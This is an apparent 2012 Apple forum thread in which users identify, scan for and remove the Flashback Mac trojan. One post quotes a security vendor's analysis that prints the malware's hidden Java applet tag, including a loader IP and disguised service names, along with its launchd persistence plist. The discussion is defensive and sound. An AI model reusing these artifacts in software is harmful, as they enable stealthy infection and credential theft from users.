Previous 1 11 12 13 14 15 16 Next 227 Replies Latest reply: Apr 12, 2012 8:53 PM by MadMacs0 Go to original post
  • X423424X Level 6 Level 6 (14,205 points)

    Thank you for doing that.  Don't have time to look at it right now (on my way out) but I downloaded it to see what I can see later.

  • Bob Mayo Level 1 Level 1 (105 points)

    Is .libgmalloc.dylib a legitimate file that is in some way corrupted by the malware, or is .libgmalloc.dylib itself bad?

    If it is a legitimate file that is corrupted by the malware, how does one restore a proper version of it?

     

    Thanks.

  • fane_j Level 4 Level 4 (3,660 points)

    Bob Mayo wrote:

     

    Is .libgmalloc.dylib a legitimate file

    No.

     

    Basically, any shared code library whose name begins with a dot (.), which renders it invisible in Finder, is unlikely to be legitimate. Note that there are many shared code libraries on your Mac, and there are quite a few files whose names begin with dots (usually containing configuration or registration data). It's the combination of code and dot as first character that makes it highly suspicious and probably not legitimate.

  • X423424X Level 6 Level 6 (14,205 points)

    (post deleted -- somehow didn't notice fane_j gave the answer I was going to give)

  • WZZZ Level 6 Level 6 (12,635 points)

    Has anyone determined what mkeeper (MacKeeper) and com.zeobit (MacKeeper developer) are doing here? From Dr. Web on the BackDoor.Flashback.39 (This was brought up quickly earlier in this thread, but AFAIK never fully explored.)

     

    http://vms.drweb.com/virus/?i=1816029

     

    <object type="application/x-java-applet" width="0" height="0"> <param name="s" value="1"/> <param name="q" value="2"/> <param name="svname" value="com.zeobit.keep"> <param name="svbname" value="mkeeper"> <param name="dname" value="Software Update"> <param name="lurl" value="31.31.79.87">'); <param name="archive" value="al-2.jar"> <param name="code" value="a.apl"> </object>

    Эксплойт сохраняет на жесткий диск исполняемый файл и plist-файл отвечайющий за его запуск.

     

    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key><string>com.zeobit.keep</string>  <key>ProgramArguments</key><array><string>/Users/<username>/.mkeeper</string></array> <key>RunAtLoad</key><true/> <key>StartInterval</key><integer>4212</integer> <key>StandardErrorPath</key><string>/dev/null</string>  <key>StandardOutPath</key><string>/dev/null</string> </dict> </plist>

    После запуска троян осуществляет проверку на наличие компонент и при наличии хотябы одной из них прекращает свое выполнение:

  • BoomerangJ111 Level 1 Level 1 (0 points)

    Deleted-incorrect data

  • Topher Kessler Level 6 Level 6 (9,565 points)

    It is not a legitimate file, and should be deleted. By default there is no file of that name or type in the Shared user directory.

  • fane_j Level 4 Level 4 (3,660 points)

     

    WZZZ wrote:

     

    Has anyone determined what mkeeper (MacKeeper) and com.zeobit are doing here

    " value="com.zeobit.keep">

     

    I can't say for certain, but I fairly sure they've nothing to do with, just like Adobe didn't have anything to do with it. These are just ID strings (which could be any valid string) used by the malware's author to confuse and obfuscate. I suspect that the identifier actually used by MacKeeper is not "com.zeobit.keep" but something else. With the Adobe string the difference was just one character, "com.adobe.reader" instead of "com.adobe.Reader".

     

    Methinks this is the one instance where MacKeeper is not to blame.

  • Topher Kessler Level 6 Level 6 (9,565 points)

    Malware has been known to hijack other application names, as we've seen with Flash in the past. MacKeeper hasn't been known to be malware, though the company behind it has pushed some questionable marketing practices and the product is not the best (it appears crudely coded in order to rake in revenue while providing minimal benefit). Many people recommend folks uninstall or avoid MacKeeper, and the presence of references to it in the latest threats do raise question, but so far it's not too conclusive.

  • X423424X Level 6 Level 6 (14,205 points)

    WZZZ wrote:

     

    Has anyone determined what mkeeper (MacKeeper) and com.zeobit are doing here

     

    The second one looks identical to the one that started this thread only executing ~/.mkeeper instead of ~/.rserv.

     

    The first one I never saw before.  But there is a reference to a some java code called al-2.jar.

  • MadMacs0 Level 5 Level 5 (4,415 points)

    Marco g wrote:

     

    If anybody is interested, i renamed it to "flserv" uploaded

    Thanks for doing that. It's the first sample I've been able to collect with this variant.

     

    Readers will be happy to know the results of the following scans:

     

    ClamXav identified it as OSX.Flashback-8.

     

    Sophos Home Edition 8 identified it as OSX/Flshplyr-D .

     

    MacScan did not detect anything.

     

    12 of 42 A-V scanners detected it on virustotal.com and the link will take you to the results. Strangely enough it had not been previously uploaded. Positive identification was achieved by avast!, BitDefender, clamav, DrWeb, F-Secure, Kaspersky and Sophos, among others. Users are cautioned that "the service was not designed as a tool to perform antivirus comparative analyses, but as a tool that checks suspicious samples with several antivirus solutions and helps antivirus labs by forwarding them the malware they fail to detect."

  • Matt Durben Level 1 Level 1 (0 points)

    Has anybody been able to detect, what this trojan exactly does? Either variant 1 for browsers or variant 2 systen/user installation? Some kind of keylogger or does it spy pw's that have been saved in ff/safari?

  • MadMacs0 Level 5 Level 5 (4,415 points)

    Matt Durben wrote:

     

    Has anybody been able to detect, what this trojan exactly does? Either variant 1 for browsers or variant 2 systen/user installation? Some kind of keylogger or does it spy pw's that have been saved in ff/safari?

    I'm certain both the Type 1 and Type 2 infections have the same goal, to use your network apps (browsers and Skype have been identified) to accomplish their goals. It has been observed to do re-directs to advertising sites, which I suppose could result in a small amount of compensation from the advertisers, but Intego believe there is a more lucrative goal which I just looked up earlier this evening in a February post Flashback Mac Trojan Horse Infections Increasing with New Variant where they say:

    This malware patches web browsers and network applications essentially to search for user names and passwords. It looks for a number of domains – websites such as Google, Yahoo!, CNN; bank websites; PayPal; and many others. Presumably, the people behind this malware are looking for both user names and passwords that they can immediately exploit – such as for a bank website – as well as others that may be reused on different sites. (Hint: don’t use the same password for all websites!)

    In a subsequent article they figured out that the results of this harvest are using Twitter to communicate back to the "Mother Ship" periodically using a specific hash tag for each date and deleting the messages after they get what they need. The message contains the unique identifier for that user and machine along with the username/password/website information.

  • etresoft Level 7 Level 7 (25,635 points)

    I have created a user tip and malware checker/removal tool: https://discussions.apple.com/docs/DOC-3271

  • dianeoforegon Level 4 Level 4 (3,845 points)

    For Office 2004 users that are infected we are seeing this in their crash logs:

     

    dyld: could not load inserted library: /User/Shared/.libgmalloc.dylib